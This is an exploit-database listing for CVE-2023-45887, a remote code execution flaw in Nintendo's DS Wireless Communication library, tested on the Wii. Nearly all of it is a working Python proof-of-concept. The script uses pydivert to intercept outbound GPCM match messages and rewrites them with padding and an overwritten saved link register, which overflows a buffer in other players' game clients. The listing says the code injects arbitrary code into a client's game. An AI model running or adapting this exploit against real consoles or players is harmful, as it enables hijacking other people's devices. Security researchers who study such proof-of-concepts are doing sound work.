Share
## https://sploitus.com/exploit?id=PACKETSTORM:177135
# Exploit Title: DS Wireless Communication Remote Code Execution  
# Date: 11 Oct 2023  
# Exploit Author: MikeIsAStar  
# Vendor Homepage: https://www.nintendo.com  
# Version: Unknown  
# Tested on: Wii  
# CVE: CVE-2023-45887  
  
"""This code will inject arbitrary code into a client's game.  
  
You are fully responsible for all activity that occurs while using this code.  
The author of this code can not be held liable to you or to anyone else as a  
result of damages caused by the usage of this code.  
"""  
  
import re  
import sys  
  
try:  
import pydivert  
except ModuleNotFoundError:  
sys.exit("The 'pydivert' module is not installed !")  
  
  
# Variables  
LR_SAVE = b'\x41\x41\x41\x41'  
assert len(LR_SAVE) == 0x04  
PADDING = b'MikeStar'  
assert len(PADDING) > 0x00  
  
# Constants  
DWC_MATCH_COMMAND_INVALID = b'\xFE'  
PADDING_LENGTH = 0x23C  
FINAL_KEY = b'\\final\\'  
WINDIVERT_FILTER = 'outbound and tcp and tcp.PayloadLength > 0'  
  
  
def try_modify_payload(payload):  
message_pattern = rb'\\msg\\GPCM([1-9][0-9]?)vMAT'  
message = re.search(message_pattern, payload)  
if not message:  
return None  
  
payload = payload[:message.end()]  
payload += DWC_MATCH_COMMAND_INVALID  
payload += (PADDING * (PADDING_LENGTH // len(PADDING) + 1))[:PADDING_LENGTH]  
payload += LR_SAVE  
payload += FINAL_KEY  
return payload  
  
  
def main():  
try:  
with pydivert.WinDivert(WINDIVERT_FILTER) as packet_buffer:  
for packet in packet_buffer:  
payload = try_modify_payload(packet.payload)  
if payload is not None:  
print('Modified a GPCM message !')  
packet.payload = payload  
packet_buffer.send(packet)  
except KeyboardInterrupt:  
pass  
except PermissionError:  
sys.exit('This program must be run with administrator privileges !')  
  
  
if __name__ == '__main__':  
main()